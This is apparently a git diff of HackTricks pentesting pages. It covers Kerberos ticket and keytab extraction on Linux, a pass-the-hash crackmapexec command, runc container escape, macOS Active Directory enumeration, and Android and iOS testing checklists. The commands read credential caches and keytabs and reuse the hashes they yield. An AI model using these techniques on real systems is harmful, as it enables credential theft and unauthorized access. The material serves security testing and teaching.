+{% content-ref url="../../windows-hardening/active-directory-methodology/pass-the-ticket.md" %}
+[pass-the-ticket.md](../../windows-hardening/active-directory-methodology/pass-the-ticket.md)
{% endcontent-ref %}
-## CCACHE ticket reuse from /tmp
+### CCACHE ticket reuse from /tmp
> When tickets are set to be stored as a file on disk, the standard format and type is a CCACHE file. This is a simple binary file format to store Kerberos credentials. These files are typically stored in /tmp and scoped with 600 permissions
@@ -48,7 +47,7 @@ krb5cc_1569901115
export KRB5CCNAME=/tmp/krb5cc_1569901115
```
-## CCACHE ticket reuse from keyring
+### CCACHE ticket reuse from keyring
Processes may **store kerberos tickets inside their memory**, this tool can be useful to extract those tickets (ptrace protection should be disabled in the machine `/proc/sys/kernel/yama/ptrace_scope`): [https://github.com/TarlogicSecurity/tickey](https://github.com/TarlogicSecurity/tickey)
@@ -70,11 +69,11 @@ make CONF=Release
[X] [uid:0] Error retrieving tickets
```
-## CCACHE ticket reuse from SSSD KCM
+### CCACHE ticket reuse from SSSD KCM
SSSD maintains a copy of the database at the path `/var/lib/sss/secrets/secrets.ldb`. The corresponding key is stored as a hidden file at the path `/var/lib/sss/secrets/.secrets.mkey`. By default, the key is only readable if you have **root** permissions.
-Invoking **`SSSDKCMExtractor` ** with the --database and --key parameters will parse the database and **decrypt the secrets**.
+Invoking \*\*`SSSDKCMExtractor` \*\* with the --database and --key parameters will parse the database and **decrypt the secrets**.
```bash
git clone https://github.com/fireeye/SSSDKCMExtractor
@@ -83,7 +82,7 @@ python3 SSSDKCMExtractor.py --database secrets.ldb --key secrets.mkey
The **credential cache Kerberos blob can be converted into a usable Kerberos CCache** file that can be passed to Mimikatz/Rubeus.
-## CCACHE ticket reuse from keytab
+### CCACHE ticket reuse from keytab
```bash
git clone https://github.com/its-a-feature/KeytabParser
@@ -91,7 +90,7 @@ python KeytabParser.py /etc/krb5.keytab
klist -k /etc/krb5.keytab
```
-## Extract accounts from /etc/krb5.keytab
+### Extract accounts from /etc/krb5.keytab
The service keys used by services that run as root are usually stored in the keytab file **`/etc/krb5.keytab`**. This service key is the equivalent of the service's password, and must be kept secure.
@@ -132,11 +131,10 @@ $ crackmapexec 10.XXX.XXX.XXX -u 'COMPUTER$' -H "31d6cfe0d16ae931b73c59d7e0c089c
CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae931b73c59d7e0c089c0
```
-# References
+## References
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory)
-
Support HackTricks and get benefits!
@@ -152,5 +150,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**Support HackTricks and get benefits!
@@ -16,16 +18,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
@@ -16,16 +16,15 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Basic information
+## Basic information
If you want to learn more about **runc** check the following page:
-{% content-ref url="../../pentesting/2375-pentesting-docker.md" %}
-[2375-pentesting-docker.md](../../pentesting/2375-pentesting-docker.md)
+{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %}
+[2375-pentesting-docker.md](../../network-services-pentesting/2375-pentesting-docker.md)
{% endcontent-ref %}
-# PE
+## PE
If you find that `runc` is installed in the host you may be able to **run a container mounting the root / folder of the host**.
@@ -57,10 +56,6 @@ runc run demo
This won't always work as the default operation of runc is to run as root, so running it as an unprivileged user simply cannot work (unless you have a rootless configuration). Making a rootless configuration the default isn't generally a good idea because there are quite a few restrictions inside rootless containers that don't apply outside rootless containers.
{% endhint %}
-
-
-
-
Support HackTricks and get benefits!
@@ -76,5 +71,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,31 +16,29 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
{% hint style="warning" %}
**Support HackTricks and get benefits!**
-Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**?
-Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
{% endhint %}
First of all, please note that **most of the tricks about privilege escalation affecting Linux/Unix will affect also MacOS** machines. So see:
-{% content-ref url="../../linux-unix/privilege-escalation/" %}
-[privilege-escalation](../../linux-unix/privilege-escalation/)
+{% content-ref url="../../linux-hardening/privilege-escalation/" %}
+[privilege-escalation](../../linux-hardening/privilege-escalation/)
{% endcontent-ref %}
-# Basic MacOS
+## Basic MacOS
-## OS X Specific Extensions
+### OS X Specific Extensions
* **`.dmg`**: Apple Disk Image files are very frequent for installers.
* **`.kext`**: It must follow a specific structure and it's the OS X version of a driver.
@@ -49,11 +47,11 @@ First of all, please note that **most of the tricks about privilege escalation a
* `defaults read config.plist`
* `/usr/libexec/PlistBuddy -c print config.plsit`
* `plutil -p config.plist`
-* **`.app`**: Apple applications that follows directory structure.
+* **`.app`**: Apple applications that follows directory structure.
* **`.dylib`**: Dynamic libraries (like Windows DLL files)
* **`.pkg`**: Are the same as xar (eXtensible Archive format). The installer command can be use to install the contents of these files.
-## File hierarchy layout
+### File hierarchy layout
* **/Applications**: The installed apps should be here. All the users will be able to access them.
* **/bin**: Command line binaries
@@ -69,15 +67,15 @@ First of all, please note that **most of the tricks about privilege escalation a
* **/usr**: Config and system binaries
* **/var**: Log files
* **/Volumes**: The mounted drives will apear here.
-* **/.vol**: Running `stat a.txt` you obtain something like `16777223 7545753 -rw-r--r-- 1 username wheel ...` where the first number is the id number of the volume where the file exists and the second one is the inode number. You can access the content of this file through /.vol/ with that information running `cat /.vol/16777223/7545753`
+* **/.vol**: Running `stat a.txt` you obtain something like `16777223 7545753 -rw-r--r-- 1 username wheel ...` where the first number is the id number of the volume where the file exists and the second one is the inode number. You can access the content of this file through /.vol/ with that information running `cat /.vol/16777223/7545753`
-## Special MacOS files and folders
+### Special MacOS files and folders
* **`.DS_Store`**: This file is on each directory, it saves the attributes and customisations of the directory.
* **`.Spotlight-V100`**: This folder appears on the root directory of every volume on the system.
* **`.metadata_never_index`**: If this file is at the root of a volume Spotlight won't index that volume.
* **`Support HackTricks and get benefits!
@@ -1263,5 +1259,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**Support HackTricks and get benefits!
@@ -16,22 +18,21 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)Support HackTricks and get benefits!
@@ -16,10 +18,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Bonjour
+## Bonjour
**Bonjour** is an Apple-designed technology that enables computers and **devices located on the same network to learn about services offered** by other computers and devices. It is designed such that any Bonjour-aware device can be plugged into a TCP/IP network and it will **pick an IP address** and make other computers on that network **aware of the services it offers**. Bonjour is sometimes referred to as Rendezvous, **Zero Configuration**, or Zeroconf.\
Zero Configuration Networking, such as Bonjour provides:
@@ -28,7 +27,7 @@ Zero Configuration Networking, such as Bonjour provides:
The device will get an **IP address in the range 169.254/16** and will check if any other device is using that IP address. If not, it will keep the IP address. Macs keeps an entry in their routing table for this subnet: `netstat -rn | grep 169`
-For DNS the **Multicast DNS (mDNS) protocol is used**. [**mDNS** **services** listen in port **5353/UDP**](../../pentesting/5353-udp-multicast-dns-mdns.md), use **regular DNS queries** and use the **multicast address 224.0.0.251** instead of sending the request just to an IP address. Any machine listening these request will respond, usually to a multicast address, so all the devices can update their tables.\
+For DNS the **Multicast DNS (mDNS) protocol is used**. [**mDNS** **services** listen in port **5353/UDP**](../../network-services-pentesting/5353-udp-multicast-dns-mdns.md), use **regular DNS queries** and use the **multicast address 224.0.0.251** instead of sending the request just to an IP address. Any machine listening these request will respond, usually to a multicast address, so all the devices can update their tables.\
Each device will **select its own name** when accessing the network, the device will choose a name **ended in .local** (might be based on the hostname or a completely random one).
For **discovering services DNS Service Discovery (DNS-SD)** is used.
@@ -92,12 +91,11 @@ If you feel like Bonjour might be more secured **disabled**, you can do so with:
sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist
```
-# References
+## References
* [**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt\_other?\_encoding=UTF8\&me=\&qid=)
* [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)
-
Support HackTricks and get benefits!
@@ -113,5 +111,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-# Common management methods
+## Common management methods
* JAMF Pro: `jamf checkJSSConnection`
* Kandji
@@ -36,20 +35,20 @@ And also about **MacOS** "special" **network** **protocols**:
[macos-protocols.md](macos-protocols.md)
{% endcontent-ref %}
-# Active Directory
+## Active Directory
In some occasions you will find that the **MacOS computer is connected to an AD**. In this scenario you should try to **enumerate** the active directory as you are use to it. Find some **help** in the following pages:
-{% content-ref url="../../pentesting/pentesting-ldap.md" %}
-[pentesting-ldap.md](../../pentesting/pentesting-ldap.md)
+{% content-ref url="../../network-services-pentesting/pentesting-ldap.md" %}
+[pentesting-ldap.md](../../network-services-pentesting/pentesting-ldap.md)
{% endcontent-ref %}
-{% content-ref url="../../windows/active-directory-methodology/" %}
-[active-directory-methodology](../../windows/active-directory-methodology/)
+{% content-ref url="../../windows-hardening/active-directory-methodology/" %}
+[active-directory-methodology](../../windows-hardening/active-directory-methodology/)
{% endcontent-ref %}
-{% content-ref url="../../pentesting/pentesting-kerberos-88/" %}
-[pentesting-kerberos-88](../../pentesting/pentesting-kerberos-88/)
+{% content-ref url="../../network-services-pentesting/pentesting-kerberos-88/" %}
+[pentesting-kerberos-88](../../network-services-pentesting/pentesting-kerberos-88/)
{% endcontent-ref %}
Some **local MacOS tool** that may also help you is `dscl`:
@@ -64,13 +63,13 @@ Also there are some tools prepared for MacOS to automatically enumerate the AD a
* [**Bifrost**](https://github.com/its-a-feature/bifrost): Bifrost is an Objective-C project designed to interact with the Heimdal krb5 APIs on macOS. The goal of the project is to enable better security testing around Kerberos on macOS devices using native APIs without requiring any other framework or packages on the target.
* [**Orchard**](https://github.com/its-a-feature/Orchard): JavaScript for Automation (JXA) tool to do Active Directory enumeration.
-## Domain Information
+### Domain Information
```
echo show com.apple.opendirectoryd.ActiveDirectory | scutil
```
-## Users
+### Users
The three types of MacOS users are:
@@ -79,7 +78,7 @@ The three types of MacOS users are:
* **Mobile Users** — Active Directory users with a local backup for their credentials and files.
The local information about users and groups is stored in in the folder _/var/db/dslocal/nodes/Default._\
-__For example, the info about user called _mark_ is stored in _/var/db/dslocal/nodes/Default/users/mark.plist_ and the info about the group _admin_ is in _/var/db/dslocal/nodes/Default/groups/admin.plist_.
+\_\_For example, the info about user called _mark_ is stored in _/var/db/dslocal/nodes/Default/users/mark.plist_ and the info about the group _admin_ is in _/var/db/dslocal/nodes/Default/groups/admin.plist_.
In addition to using the HasSession and AdminTo edges, **MacHound adds three new edges** to the Bloodhound database:
@@ -111,21 +110,20 @@ dsconfigad -show
More info in [https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/](https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/)
-# External Services
+## External Services
MacOS Red Teaming is different from a regular Windows Red Teaming as usually **MacOS is integrated with several external platforms directly**. A common configuration of MacOS is to access to the computer using **OneLogin synchronised credentials, and accessing several external services** (like github, aws...) via OneLogin:
.png>)
-##
+###
-# References
+## References
* [https://www.youtube.com/watch?v=IiMladUbL6E](https://www.youtube.com/watch?v=IiMladUbL6E)
* [https://medium.com/xm-cyber/introducing-machound-a-solution-to-macos-active-directory-based-attacks-2a425f0a22b6](https://medium.com/xm-cyber/introducing-machound-a-solution-to-macos-active-directory-based-attacks-2a425f0a22b6)
* [https://gist.github.com/its-a-feature/1a34f597fb30985a2742bb16116e74e0](https://gist.github.com/its-a-feature/1a34f597fb30985a2742bb16116e74e0)
-
Support HackTricks and get benefits!
@@ -141,5 +139,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**Support HackTricks and get benefits!
@@ -16,8 +18,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)Support HackTricks and get benefits!
@@ -16,29 +18,28 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)Support HackTricks and get benefits!
@@ -16,10 +18,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)Support HackTricks and get benefits!
@@ -16,8 +18,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
@@ -16,23 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-{% hint style="warning" %}
-**Support HackTricks and get benefits!**
-
-Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**?
-Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-{% endhint %}
-
-## [Learn Android fundamentals](android-app-pentesting/#2-android-application-fundamentals)
+### [Learn Android fundamentals](android-app-pentesting/#2-android-application-fundamentals)
* [ ] [Basics](android-app-pentesting/#fundamentals-review)
* [ ] [Dalvik & Smali](android-app-pentesting/#dalvik--smali)
@@ -48,7 +32,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [ ] [How to use ADB](android-app-pentesting/#adb-android-debug-bridge)
* [ ] [How to modify Smali](android-app-pentesting/#smali)
-## [Static Analysis](android-app-pentesting/#static-analysis)
+### [Static Analysis](android-app-pentesting/#static-analysis)
* [ ] Check for the use of [obfuscation](android-checklist.md#some-obfuscation-deobfuscation-information), checks for noting if the mobile was rooted, if an emulator is being used and anti-tampering checks. [Read this for more info](android-app-pentesting/#other-checks).
* [ ] Sensitive applications (like bank apps) should check if the mobile is rooted and should actuate in consequence.
@@ -67,7 +51,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [ ] All the libraries compiled using the PIE flag?
* [ ] Don't forget that there is a bunch of[ static Android Analyzers](android-app-pentesting/#automatic-analysis) that can help you a lot during this phase.
-## [Dynamic Analysis](android-app-pentesting/#dynamic-analysis)
+### [Dynamic Analysis](android-app-pentesting/#dynamic-analysis)
* [ ] Prepare the environment ([online](android-app-pentesting/#online-dynamic-analysis), [local VM or physical](android-app-pentesting/#local-dynamic-analysis))
* [ ] Is there any [unintended data leakage](android-app-pentesting/#unintended-data-leakage) (logging, copy/paste, crash logs)?
@@ -82,11 +66,10 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [ ] Check for possible [Android Client Side Injections](android-app-pentesting/#android-client-side-injections-and-others) (probably some static code analysis will help here)
* [ ] [Frida](android-app-pentesting/#frida): Just Frida, use it to obtain interesting dynamic data from the application (maybe some passwords...)
-## Some obfuscation/Deobfuscation information
+### Some obfuscation/Deobfuscation information
* [ ] [Read here](android-app-pentesting/#obfuscating-deobfuscating-code)
-
Support HackTricks and get benefits!
@@ -102,5 +85,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
@@ -16,29 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-{% hint style="warning" %}
-**Support HackTricks and get benefits!**
-
-Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**?
-Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-{% endhint %}
-
-## Preparation
+### Preparation
* [ ] Read [**iOS Basics**](ios-pentesting/ios-basics.md)
* [ ] Prepare your environment reading [**iOS Testing Environment**](ios-pentesting/ios-testing-environment.md)
* [ ] Read all the sections of [**iOS Initial Analysis**](ios-pentesting/#initial-analysis) to learn common actions to pentest an iOS application
-## Data Storage
+### Data Storage
* [ ] [**Plist files**](ios-pentesting/#plist) can be used to store sensitive information.
* [ ] [**Core Data**](ios-pentesting/#core-data) (SQLite database) can store sensitive information.
@@ -52,37 +36,37 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [ ] [**Keychain**](ios-pentesting/#keychain) is usually used to store sensitive information that can be left when reselling the phone.
* [ ] In summary, just **check for sensitive information saved by the application in the filesystem**
-## Keyboards
+### Keyboards
* [ ] Does the application [**allow to use custom keyboards**](ios-pentesting/#custom-keyboards-keyboard-cache)?
* [ ] Check if sensitive information is saved in the [**keyboards cache files**](ios-pentesting/#custom-keyboards-keyboard-cache)
-## **Logs**
+### **Logs**
* [ ] Check if [**sensitive information is being logged**](ios-pentesting/#logs)
-## Backups
+### Backups
* [ ] [**Backups**](ios-pentesting/#backups) can be used to **access the sensitive information** saved in the file system (check the initial point of this checklist)
* [ ] Also, [**backups**](ios-pentesting/#backups) can be used to **modify some configurations of the application**, then **restore** the backup on the phone, and the as the **modified configuration** is **loaded** some (security) **functionality** may be **bypassed**
-## **Applications Memory**
+### **Applications Memory**
* [ ] Check for sensitive information inside the [**application's memory**](ios-pentesting/#testing-memory-for-sensitive-data)
-## **Broken Cryptography**
+### **Broken Cryptography**
* [ ] Check if yo can find [**passwords used for cryptography**](ios-pentesting/#broken-cryptography)
* [ ] Check for the use of [**deprecated/weak algorithms**](ios-pentesting/#broken-cryptography) to send/store sensitive data
* [ ] [**Hook and monitor cryptography functions**](ios-pentesting/#broken-cryptography)
-## **Local Authentication**
+### **Local Authentication**
* [ ] If a [**local authentication**](ios-pentesting/#local-authentication) is used in the application, you should check how the authentication is working.
* [ ] If it's using the [**Local Authentication Framework**](ios-pentesting/#local-authentication-framework) it could be easily bypassed
* [ ] If it's using a [**function that can dynamically bypassed**](ios-pentesting/#local-authentication-using-keychain) you could create a custom frida script
-## Sensitive Functionality Exposure Through IPC
+### Sensitive Functionality Exposure Through IPC
* [**Custom URI Handlers / Deeplinks / Custom Schemes**](ios-pentesting/#custom-uri-handlers-deeplinks-custom-schemes)
* [ ] Check if the application is **registering any protocol/scheme**
@@ -92,7 +76,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [ ] Check if the application **exposes any sensitive action** that can be called from anywhere via the custom scheme
* [**Universal Links**](ios-pentesting/#universal-links)
* [ ] Check if the application is **registering any universal protocol/scheme**
- * [ ] Check the `apple-app-site-association` file
+ * [ ] Check the `apple-app-site-association` file
* [ ] Check if the application **isn't checking and sanitizing** users input via the custom scheme and some **vulnerability can be exploited**
* [ ] Check if the application **exposes any sensitive action** that can be called from anywhere via the custom scheme
* [**UIActivity Sharing**](ios-pentesting/ios-uiactivity-sharing.md)
@@ -109,18 +93,17 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [ ] Check if the webview can **access local files** with the protocol **file://** **(**`allowFileAccessFromFileURLs`, `allowUniversalAccessFromFileURLs`)
* [ ] Check if Javascript can access **Native** **methods** (`JSContext`, `postMessage`)
-## Network Communication
+### Network Communication
* [ ] Perform a [**MitM to the communication**](ios-pentesting/#network-communication) and search for web vulnerabilities.
* [ ] Check if the [**hostname of the certificate**](ios-pentesting/#hostname-check) is checked
* [ ] Check/Bypass [**Certificate Pinning**](ios-pentesting/#certificate-pinning)
-## **Misc**
+### **Misc**
* [ ] Check for [**automatic patching/updating**](ios-pentesting/#hot-patching-enforced-updateing) mechanisms
* [ ] Check for [**malicious third party libraries**](ios-pentesting/#third-parties)
-
Support HackTricks and get benefits!
@@ -136,5 +119,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**Support HackTricks and get benefits!
@@ -16,14 +18,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
@@ -16,7 +16,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
**Content copied form** [**https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#app-extensions**](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#app-extensions)
App extensions let apps offer custom functionality and content to users while they’re interacting with other apps or the system. Some notable ones are:
@@ -29,7 +28,7 @@ For example, the user selects text in the _host app_, clicks on the "Share" butt
-## **Security Considerations**
+### **Security Considerations**
From the security point of view it is important to note that:
@@ -43,9 +42,9 @@ From the security point of view it is important to note that:
* **No long-running background tasks** are allowed but uploads or downloads can be initiated.
* App extensions **cannot access the camera or microphone on an iOS device** (except for iMessage app extensions).
-## Static analysis
+### Static analysis
-### **Verifying if the App Contains App Extensions**
+#### **Verifying if the App Contains App Extensions**
If you have the original source code you can search for all occurrences of `NSExtensionPointIdentifier` with Xcode (cmd+shift+f) or take a look into "Build Phases / Embed App extensions":
@@ -84,7 +83,7 @@ Directory 493 None True False SiriIntents.appex
We can see now the same four app extensions that we saw in Xcode before.
-### **Determining the Supported Data Types**
+#### **Determining the Supported Data Types**
This is important for data being shared with host apps (e.g. via Share or Action Extensions). When the user selects some data type in a host app and it matches the data types define here, the host app will offer the extension. It is worth noticing the difference between this and data sharing via `UIActivity` where we had to define the document types, also using UTIs. An app does not need to have an extension for that. It is possible to share data using only `UIActivity`.
@@ -111,7 +110,7 @@ Only the data types present here and not having `0` as `MaxCount` will be suppor
Remember that app extensions and their containing apps do not have direct access to each other’s containers. However, data sharing can be enabled. This is done via ["App Groups"](https://developer.apple.com/library/archive/documentation/Miscellaneous/Reference/EntitlementKeyReference/Chapters/EnablingAppSandbox.html#//apple\_ref/doc/uid/TP40011195-CH4-SW19) and the [`NSUserDefaults`](https://developer.apple.com/documentation/foundation/nsuserdefaults) API. See this figure from [Apple App Extension Programming Guide](https://developer.apple.com/library/archive/documentation/General/Conceptual/ExtensibilityPG/ExtensionScenarios.html#//apple\_ref/doc/uid/TP40014214-CH21-SW11):
-
+
As also mentioned in the guide, the app must set up a shared container if the app extension uses the `NSURLSession` class to perform a background upload or download, so that both the extension and its containing app can access the transferred data.
@@ -123,7 +122,7 @@ It is possible to reject a specific type of app extension by using the following
However, it is currently only possible for "custom keyboard" app extensions (and should be verified when testing apps handling sensitive data via the keyboard like e.g. banking apps).
-## Dynamic Analysis
+### Dynamic Analysis
For the dynamic analysis we can do the following to gain knowledge without having the source code:
@@ -190,8 +189,7 @@ As you can see there are two app extensions involved:
If you want to learn more about what's happening under-the-hood in terms of XPC, we recommend to take a look at the internal calls from "libxpc.dylib". For example you can use [`frida-trace`](https://www.frida.re/docs/frida-trace/) and then dig deeper into the methods that you find more interesting by extending the automatically generated stubs.
-##
-
+###
@@ -208,5 +206,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/mobile-apps-pentesting/ios-pentesting/ios-basics.md b/mobile-pentesting/ios-pentesting/ios-basics.md
similarity index 100%
rename from mobile-apps-pentesting/ios-pentesting/ios-basics.md
rename to mobile-pentesting/ios-pentesting/ios-basics.md
diff --git a/mobile-apps-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md b/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md
similarity index 100%
rename from mobile-apps-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md
rename to mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md
diff --git a/mobile-apps-pentesting/ios-pentesting/ios-hooking-with-objection.md b/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md
similarity index 100%
rename from mobile-apps-pentesting/ios-pentesting/ios-hooking-with-objection.md
rename to mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md
diff --git a/mobile-apps-pentesting/ios-pentesting/ios-protocol-handlers.md b/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md
similarity index 100%
rename from mobile-apps-pentesting/ios-pentesting/ios-protocol-handlers.md
rename to mobile-pentesting/ios-pentesting/ios-protocol-handlers.md
diff --git a/mobile-apps-pentesting/ios-pentesting/ios-serialisation-and-encoding.md b/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md
similarity index 100%
rename from mobile-apps-pentesting/ios-pentesting/ios-serialisation-and-encoding.md
rename to mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md
diff --git a/mobile-apps-pentesting/ios-pentesting/ios-testing-environment.md b/mobile-pentesting/ios-pentesting/ios-testing-environment.md
similarity index 100%
rename from mobile-apps-pentesting/ios-pentesting/ios-testing-environment.md
rename to mobile-pentesting/ios-pentesting/ios-testing-environment.md
diff --git a/mobile-apps-pentesting/ios-pentesting/ios-uiactivity-sharing.md b/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md
similarity index 100%
rename from mobile-apps-pentesting/ios-pentesting/ios-uiactivity-sharing.md
rename to mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md
diff --git a/mobile-apps-pentesting/ios-pentesting/ios-uipasteboard.md b/mobile-pentesting/ios-pentesting/ios-uipasteboard.md
similarity index 100%
rename from mobile-apps-pentesting/ios-pentesting/ios-uipasteboard.md
rename to mobile-pentesting/ios-pentesting/ios-uipasteboard.md
diff --git a/mobile-apps-pentesting/ios-pentesting/ios-universal-links.md b/mobile-pentesting/ios-pentesting/ios-universal-links.md
similarity index 100%
rename from mobile-apps-pentesting/ios-pentesting/ios-universal-links.md
rename to mobile-pentesting/ios-pentesting/ios-universal-links.md
diff --git a/mobile-apps-pentesting/ios-pentesting/ios-webviews.md b/mobile-pentesting/ios-pentesting/ios-webviews.md
similarity index 100%
rename from mobile-apps-pentesting/ios-pentesting/ios-webviews.md
rename to mobile-pentesting/ios-pentesting/ios-webviews.md
diff --git a/pentesting/10000-network-data-management-protocol-ndmp.md b/network-services-pentesting/10000-network-data-management-protocol-ndmp.md
similarity index 100%
rename from pentesting/10000-network-data-management-protocol-ndmp.md
rename to network-services-pentesting/10000-network-data-management-protocol-ndmp.md
